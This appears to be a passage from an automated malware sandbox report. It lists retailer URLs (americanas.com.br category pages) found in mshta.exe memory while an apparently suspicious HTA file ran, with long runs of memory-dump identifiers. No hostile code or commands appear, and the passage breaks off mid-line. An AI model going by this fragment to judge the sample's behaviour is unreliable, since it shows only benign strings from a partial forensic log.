https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_hm_tt_1_0_celulares
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539093829.000000000653B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/celulares-e-smartphones?chave=pfm_home_smartphones_menu
Source: mshta.exe, 00000000.00000003.2664171298.0000000006E3E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654927301.000000000A91C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666676210.000000000C132000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653491423.0000000006E32000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/decoracao
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648901167.000000000C08D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cervejeira?chave=pfm_hm_tt_1_0_cervejeira
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2667474903.00000000092FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador
Source: mshta.exe, 00000000.00000003.2668217939.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666770510.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654573582.000000000A918000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751165460.000000000A919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/coifa-e-depurador)
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769737013.0000000006EF8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/cooktop?chave=pfm_hm_tt_1_0_cooktop
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660215955.000000000C102000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2669838233.000000000AC47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2764328514.000000000AC47000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2652183506.000000000C0E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655218340.000000000AC2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649211244.000000000AC29000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714211819.0000000009A89000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665417353.000000000C120000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654534140.000000000C0F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655582214.000000000AC44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/fogao?chave=pfm_hm_tt_1_0_fogao
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2717207102.0000000009A5F000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695409967.0000000009A5D000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/forno-de-embutir?chave=pfm_hm_tt_1_0_forno-
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2769831858.0000000006F1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656547873.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2665163522.0000000006EF3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2748531062.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2654777564.0000000006EF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648570503.0000000006EEB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2766288586.0000000003410000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/freezer?chave=pfm_hm_tt_1_0_freezer
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/freezer?chave=pfm_hm_tt_1_0_freezer_
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2661257377.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668679539.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2664288455.00000000093CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2653785457.00000000093AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2719776762.0000000009B1C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2726694217.00000000093CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2700075180.0000000009B1B000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2695056715.0000000009B1A000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656004921.00000000093CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/geladeira-refrigerador?chave=pfm_hm_tt_1_0_
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-e-seca?chave=pfm_hm_tt_1_0_lava-e-seca
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770103069.000000000927E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2728542015.000000000921B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/lava-loucas?chave=pfm_hm_tt_1_0_lava-loucas
Source: mshta.exe, 00000000.00000003.2654927301.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2727732575.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2774601657.000000000A9D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2650997634.000000000A8A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668090203.000000000C191000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/maquina-de-lavar?chave=pfm_hm_tt_1_0_maquin
Source: mshta.exe, 00000000.00000003.2677244929.00000000092EF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657042776.00000000092E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2666836298.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2670136845.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2743843394.00000000092F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2751994792.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2771261740.00000000092F8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2744706415.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2656497357.00000000092AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2649378434.0000000009293000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/eletrodomesticos/micro-ondas?chave=pfm_hm_tt_1_0_micro-ondas
Source: mshta.exe, 00000000.00000003.2648378979.000000000C178000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2714640345.0000000009A55000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2538310742.000000000654C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668909643.000000000A8B1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2655488745.00000000092A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2612013556.000000000DCF0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2651095257.00000000092A1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2668398885.000000000A8AE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.2770661764.00000000092B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2675583442.000000000A8B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2657306854.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2705493492.0000000009A54000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2539284550.000000000DC65000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.2660536258.000000000A8AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 